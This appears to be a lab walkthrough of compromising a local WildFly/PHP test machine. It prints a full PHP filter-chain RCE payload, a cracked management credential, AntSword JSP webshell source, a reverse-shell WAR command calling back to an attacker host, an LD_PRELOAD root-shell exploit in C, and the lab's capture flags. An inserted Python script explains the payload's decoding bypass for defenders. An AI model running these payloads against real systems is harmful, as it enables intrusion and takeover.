nmap results:

nmap -p- -n 192.168.56.103 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-26 21:55 EST
Nmap scan report for 192.168.56.103
Host is up (0.0018s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
8443/tcp open  https-alt
9990/tcp open  osm-appsrvr
MAC Address: 08:00:27:F0:BC:9C (Oracle VirtualBox virtual NIC)

Directory brute-forcing turned up an LFI, and from there it is RCE.

This needs a tool: https://github.com/synacktiv/php_filter_chain_generator

Generate a payload and drop it in to check:

http://192.168.56.103/recipe.php?file=php://filter/convert.i%2563onv.UTF8.CSISO2022KR|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.UTF8.UTF16|convert.i%2563onv.WINDOWS-1258.UTF32LE|convert.i%2563onv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.ISO2022KR.UTF16|convert.i%2563onv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.865.UTF16|convert.i%2563onv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CSA_T500.UTF-32|convert.i%2563onv.CP857.ISO-2022-JP-3|convert.i%2563onv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.IBM891.CSUNICODE|convert.i%2563onv.ISO8859-14.ISO6937|convert.i%2563onv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.UTF8.UTF16LE|convert.i%2563onv.UTF8.CSISO2022KR|convert.i%2563onv.UCS2.UTF8|convert.i%2563onv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP861.UTF-16|convert.i%2563onv.L4.GB13000|convert.i%2563onv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP869.UTF-32|convert.i%2563onv.MACUK.UCS4|convert.i%2563onv.UTF16BE.866|convert.i%2563onv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.JS.UNICODE|convert.i%2563onv.L4.UCS2|convert.i%2563onv.UCS-2.OSF00030010|convert.i%2563onv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.PT.UTF32|convert.i%2563onv.KOI8-U.IBM-932|convert.i%2563onv.SJIS.EUCJP-WIN|convert.i%2563onv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.ISO88597.UTF16|convert.i%2563onv.RK1048.UCS-4LE|convert.i%2563onv.UTF32.CP1167|convert.i%2563onv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.INIS.UTF16|convert.i%2563onv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.L5.UTF-32|convert.i%2563onv.ISO88594.GB13000|convert.i%2563onv.CP950.SHIFT_JISX0213|convert.i%2563onv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP861.UTF-16|convert.i%2563onv.L4.GB13000|convert.i%2563onv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP861.UTF-16|convert.i%2563onv.L4.GB13000|convert.i%2563onv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.INIS.UTF16|convert.i%2563onv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.L5.UTF-32|convert.i%2563onv.ISO88594.GB13000|convert.i%2563onv.CP950.SHIFT_JISX0213|convert.i%2563onv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.863.UNICODE|convert.i%2563onv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.ISO88597.UTF16|convert.i%2563onv.RK1048.UCS-4LE|convert.i%2563onv.UTF32.CP1167|convert.i%2563onv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.PT.UTF32|convert.i%2563onv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.JS.UNICODE|convert.i%2563onv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.SE2.UTF-16|convert.i%2563onv.CSIBM921.NAPLPS|convert.i%2563onv.855.CP936|convert.i%2563onv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.JS.UNICODE|convert.i%2563onv.L4.UCS2|convert.i%2563onv.UCS-2.OSF00030010|convert.i%2563onv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CSGB2312.UTF-32|convert.i%2563onv.IBM-1161.IBM932|convert.i%2563onv.GB13000.UTF16BE|convert.i%2563onv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.SE2.UTF-16|convert.i%2563onv.CSIBM1161.IBM-932|convert.i%2563onv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.PT.UTF32|convert.i%2563onv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.SE2.UTF-16|convert.i%2563onv.CSIBM1161.IBM-932|convert.i%2563onv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.SE2.UTF-16|convert.i%2563onv.CSIBM921.NAPLPS|convert.i%2563onv.855.CP936|convert.i%2563onv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.8859_3.UTF16|convert.i%2563onv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP1046.UTF16|convert.i%2563onv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CP1046.UTF32|convert.i%2563onv.L6.UCS-2|convert.i%2563onv.UTF-16LE.T.61-8BIT|convert.i%2563onv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.MAC.UTF16|convert.i%2563onv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.CSIBM1161.UNICODE|convert.i%2563onv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.INIS.UTF16|convert.i%2563onv.CSIBM1133.IBM943|convert.i%2563onv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.i%2563onv.SE2.UTF-16|convert.i%2563onv.CSIBM1161.IBM-932|convert.i%2563onv.MS932.MS936|convert.i%2563onv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.i%2563onv.UTF8.UTF7|convert.base64-decode/resource=php://temp&1=phpinfo();
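Two things about that payload are worth seeing explicitly. First, the resource is php://temp, which is empty: every byte of the PHP code that ends up being included is manufactured by the chain of convert.iconv.* and base64 steps, which is why it is so long. Second, the filters are spelled i%2563onv rather than iconv: %2563 is a double-URL-encoded c, so after the web server decodes the query string once a filter keyed on the word "iconv" still only sees i%63onv, while PHP's php://filter wrapper url-decodes each filter name a second time and applies convert.iconv regardless. The following is an added example (not code from the post or from php_filter_chain_generator) that reproduces those two decoding layers on a short constructed chain of the same shape; the host, script name and file parameter are the ones from the post, and the parser handles only the plain filter1|filter2/resource= form that payload uses, not read=/write= groups.

```python
"""Decode a php://filter chain URL the way PHP does, to see what a WAF that
only URL-decodes once would miss."""
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

FILTER_PREFIX = "php://filter/"

# Constructed sample: a two-filter chain in the same shape as the real payload
# (same host, script and parameter as the post; the chain itself is made up).
SAMPLE_URL = (
    "http://192.168.56.103/recipe.php?file=php://filter/"
    "convert.i%2563onv.UTF8.UTF7|convert.base64-decode/resource=php://temp&1=phpinfo();"
)


def file_param_after_one_decode(url: str) -> str:
    """What a proxy/WAF sees: the query string decoded exactly once (%2563 -> %63)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params["file"][0]


def php_filter_chain(value: str):
    """Split a php://filter value into (filters, resource) as the wrapper does.

    The wrapper url-decodes every filter name again, so 'i%63onv' becomes
    'iconv' here even though the once-decoded request still reads 'i%63onv'.
    Only the plain 'a|b|c/resource=...' form is handled (no read=/write= groups).
    """
    if not value.startswith(FILTER_PREFIX):
        raise ValueError("not a php://filter URL")
    chain, sep, resource = value[len(FILTER_PREFIX):].partition("/resource=")
    if not sep:
        raise ValueError("missing /resource=")
    filters = [unquote(name) for name in chain.split("|")]
    return filters, resource


def summarize(filters):
    """Count filters by family; a generated chain is mostly iconv plus base64 steps."""
    kinds = Counter()
    for f in filters:
        kinds["iconv" if f.startswith("convert.iconv.") else f] += 1
    return dict(kinds)


def resolve(url: str):
    """Return (once-decoded file param, filters PHP applies, resource)."""
    once = file_param_after_one_decode(url)
    filters, resource = php_filter_chain(once)
    return once, filters, resource


if __name__ == "__main__":
    once, filters, resource = resolve(SAMPLE_URL)
    print("after one decode   :", once)
    print("filters PHP applies:", filters)
    print("resource           :", resource, "(php://temp is empty; all output comes from the chain)")
    print("summary            :", summarize(filters))
```

Point resolve() at the full payload above and summarize() shows how many iconv conversions it takes to synthesize a few bytes of PHP; the interesting defensive takeaway is the gap between `once` (still containing i%63onv) and `filters` (containing convert.iconv), which is exactly the gap a single-decode keyword filter falls into.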

Connect with AntSword and take a look:

tod:x:1002:1002:,,,:/home/tod:/bin/zsh

The first flag is probably about getting to this tod user.

The service on port 8080 is WildFly.

9990 is its management console and needs authentication.

Asked GPT where WildFly keeps its management users.

Didn't find the file at first.

Later found it under /opt.

Then read it:

cat /opt/wildfly/domain/configuration/mgmt-users.properties
#
# Properties declaration of users for the realm 'ManagementRealm' which is the default realm
# for new installations. Further authentication mechanism can be configured
# as part of the <management /> in host.xml.
#
# Users can be added to this properties file at any time, updates after the server has started
# will be automatically detected.
#
# By default the properties realm expects the entries to be in the format: -
# username=HEX( MD5( username ':' realm ':' password))
#
# A utility script is provided which can be executed from the bin folder to add the users: -
# - Linux
# bin/add-user.sh
#
# - Windows
# bin\add-user.bat
#
#$REALM_NAME=ManagementRealm$ This line is used by the add-user utility to identify the realm name already used in this file.
#
# On start-up the server will also automatically add a user $local - this user is specifically
# for local tools running against this AS installation.
#
# The following illustrates how an admin user could be defined, this
# is for illustration only and does not correspond to a usable password.
#
administrator=3bfa7f34174555fe766d0e0295821742

Cracking it gives:

ManagementRealm
administrator=3bfa7f34174555fe766d0e0295821742
katarina9

Log in with administrator / katarina9.

This is the console.

There is a WAR upload point here.

I don't know why, but uploading a WAR packed from a malicious one-liner JSP just wouldn't work:

<%!
// AntSword's JSP shell template: a throwaway ClassLoader whose only job is to turn a
// byte[] into a loaded class (defineClass is protected, hence the subclass).
class U extends ClassLoader {
    U(ClassLoader c) {
        super(c);
    }
    public Class g(byte[] b) {
        return super.defineClass(b, 0, b.length);
    }
}

// Base64 decoding that works on both old (sun.misc) and current (java.util) JDKs.
public byte[] base64Decode(String str) throws Exception {
    try {
        Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
        Class clazz = Class.forName("java.util.Base64");
        Object decoder = clazz.getMethod("getDecoder").invoke(null);
        return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
}
%>
<%
// The "ant" parameter carries a base64-encoded class; it is defined, instantiated, and handed
// the pageContext through equals() so it can read the request and write the response.
String cls = request.getParameter("ant");
if (cls != null) {
    new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>

Packed with: jar -cvf r.war .\r.jsp

It even tripped the AV, yet clicking connect just wouldn't connect.

I'm really not familiar with JSP! Something to study properly next time~

Later I saw that a pro used a tool, GodOfWar. Heh, a script kiddie after all!

GitHub: https://github.com/KINGSABRI/godofwar/

Install: gem install godofwar

Then generate a reverse-shell WAR directly: godofwar -p reverse_shell -H 192.168.56.102 -P 9999 -o wild

Then start a listener, deploy the WAR through the console, and visit the malicious JSP to get a shell.

Privilege escalation

Shared-library hijacking via LD_PRELOAD: upload exp.so. (Something to learn~ I've only heard of this binary stuff, I think in the context of bypassing disable_functions?) This only works when there is a way to start a root process with LD_PRELOAD honored, typically sudo with env_keep += LD_PRELOAD in sudoers.

#include <stdio.h>      // printf
#include <sys/types.h>  // types used by setuid/setgid
#include <unistd.h>     // setuid, setgid
#include <stdlib.h>     // unsetenv, system

// Runs as soon as the library is loaded via LD_PRELOAD into a root process
// (-nostartfiles lets us supply our own _init instead of the CRT one).
void _init() {
    unsetenv("LD_PRELOAD"); // don't preload ourselves into the child shell as well
    setgid(0);              // GID 0 (root)
    setuid(0);              // UID 0 (root)
    system("/bin/bash");    // spawn a root shell
}

Compile: gcc -fPIC -shared -o exp.so exp.c -nostartfiles

Download the malicious .so onto the box and it's straight to root.

Finally, the two flags:

c1cc7f5179a168ec93095695f20c9e3f
d8592e5a179d4b80e099f4c9a460c6e4